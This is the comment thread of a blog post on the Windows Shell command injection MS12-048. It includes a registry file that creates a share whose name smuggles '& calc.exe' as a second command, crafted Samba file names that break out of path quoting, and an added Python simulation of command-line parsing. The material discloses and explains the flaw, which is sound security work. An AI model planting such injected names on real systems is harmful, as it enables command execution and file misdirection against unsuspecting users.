
July 16, 2012

Listed below are links to weblogs that reference Microsoft Windows Shell Command Injection - MS12-048 (CVE-2012-0175):

Comments

丸子

Good post, and this might be a good idea to bypass some limitations of webshell uploading.

ct

nice one

jp

Windows does support this behavior if you set the value via a registry key re:


Windows Registry Editor Version 5.00

; hex(7) is REG_MULTI_SZ: UTF-16LE strings, each NUL-terminated, list ends with an extra NUL.
; Decoded, the value below holds: CSCFlags=0 | MaxUses=4294967295 | Path=C:\Test |
; Permissions=0 | Remark= | ShareName=for "xxx & calc.exe | Type=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\LanmanServer\Shares]
"for \"xxx & calc.exe"=hex(7):43,00,53,00,43,00,46,00,6c,00,61,00,67,00,73,00,\
3d,00,30,00,00,00,4d,00,61,00,78,00,55,00,73,00,65,00,73,00,3d,00,34,00,32,\
00,39,00,34,00,39,00,36,00,37,00,32,00,39,00,35,00,00,00,50,00,61,00,74,00,\
68,00,3d,00,43,00,3a,00,5c,00,54,00,65,00,73,00,74,00,00,00,50,00,65,00,72,\
00,6d,00,69,00,73,00,73,00,69,00,6f,00,6e,00,73,00,3d,00,30,00,00,00,52,00,\
65,00,6d,00,61,00,72,00,6b,00,3d,00,00,00,53,00,68,00,61,00,72,00,65,00,4e,\
00,61,00,6d,00,65,00,3d,00,66,00,6f,00,72,00,20,00,22,00,78,00,78,00,78,00,\
20,00,26,00,20,00,63,00,61,00,6c,00,63,00,2e,00,65,00,78,00,65,00,00,00,54,\
00,79,00,70,00,65,00,3d,00,30,00,00,00,00,00

Adi Cohen

Very nice. I suspected this could be possible but haven't got around to it. Thanks for sharing.

Nick

You might be able to add
"mangled names = no"
to your smb.conf. That should prevent what you have in figure 2.

Adi Cohen

Hi Nick,
That's a great catch.

This could allow for a file with the following name to exist:
a/a.txt" .html

When a user double-clicks this file, the registered application will get access to a file named 'a.txt' under a folder named 'a'.
The attached image shows this scenario.
http://img821.imageshack.us/img821/8010/36262549.png


Updated machines will not accept a file whose name contains a double-quote sign.
Therefore breaking out of the string surrounding the path in order to add arguments or just truncate the path string itself (used in the example above) will not work.
However, it is possible to use the following file name:
a/a.html

to produce a case where patched systems will still open the file 'a.html' under the folder 'a' instead of the real file.
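The following is an added simulation, not code from the original post or from any commenter, of what the reply above describes: the shell expands the handler's command template with the full path of the double-clicked entry, the handler's C runtime splits that command line into argv, and Windows then treats '/' in the received path as a directory separator. The association template `"C:\Program Files\Viewer\viewer.exe" "%1"`, the share `\\server\share`, and the three directory entries are assumptions constructed for the example; the parser implements the classic MSVCRT / CommandLineToArgvW quoting rules (the newer `""` rule is left out).

```python
import ntpath

# Assumed for this example: the file-association command for the file type.
# The real template depends on the handler registered for the extension.
ASSOC_TEMPLATE = '"C:\\Program Files\\Viewer\\viewer.exe" "%1"'

# Assumed UNC path of the Samba share the user browses.
SHARE = r"\\server\share"

# Characters Windows forbids in file names; Samba with "mangled names = no"
# can still expose POSIX names that contain them.
WINDOWS_ILLEGAL = set('<>:"/\\|?*')


def build_command_line(template, path):
    """Model the shell substituting the opened file's full path for %1."""
    return template.replace("%1", path)


def parse_command_line(cmdline):
    """Split a Windows command line into argv with the classic MSVCRT /
    CommandLineToArgvW rules: whitespace separates arguments outside quotes,
    a double quote toggles quoted mode, and backslashes are special only when
    they precede a double quote (2n -> n backslashes and the quote is a
    delimiter; 2n+1 -> n backslashes plus a literal quote)."""
    argv, cur = [], []
    in_arg = in_quotes = False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            run = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (run // 2))
                if run % 2:              # odd run: the quote is literal
                    cur.append('"')
                    j += 1
            else:                        # not before a quote: all literal
                cur.append("\\" * run)
            in_arg, i = True, j
        elif c == '"':
            in_quotes = not in_quotes
            in_arg, i = True, i + 1
        elif c in " \t" and not in_quotes:
            if in_arg:
                argv.append("".join(cur))
                cur, in_arg = [], False
            i += 1
        else:
            cur.append(c)
            in_arg, i = True, i + 1
    if in_arg:
        argv.append("".join(cur))
    return argv


def resolve_opened_file(entry_name, share=SHARE):
    """Return (argv, path_as_received, normalized_path, extra_args) for a
    directory entry named entry_name that the user double-clicks on share."""
    full_path = share + "\\" + entry_name
    argv = parse_command_line(build_command_line(ASSOC_TEMPLATE, full_path))
    received = argv[1] if len(argv) > 1 else ""
    # Windows accepts '/' as a path separator, so normpath shows which file
    # the handler will actually try to open.
    return argv, received, ntpath.normpath(received), argv[2:]


def has_windows_illegal_chars(name):
    """Server-side check: flag names Windows clients could misparse."""
    return any(ch in WINDOWS_ILLEGAL for ch in name)


if __name__ == "__main__":
    # Constructed entries: a normal name, the pre-patch quote breakout from
    # the comment above, and the slash-only name that survives the patch.
    for name in ["report.html", 'a/a.txt" .html', "a/a.html"]:
        argv, received, opened, extra = resolve_opened_file(name)
        print(f"entry {name!r}")
        print(f"  argv[1] = {received!r}, extra args = {extra}")
        print(f"  handler opens {opened!r}; "
              f"illegal chars: {has_windows_illegal_chars(name)}")
```

For `a/a.txt" .html` the handler receives `\\server\share\a/a.txt` plus a stray `.html` argument and opens `\\server\share\a\a.txt`; for `a/a.html` no quote is needed, and the normalized path `\\server\share\a\a.html` still differs from the single share entry that was clicked.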
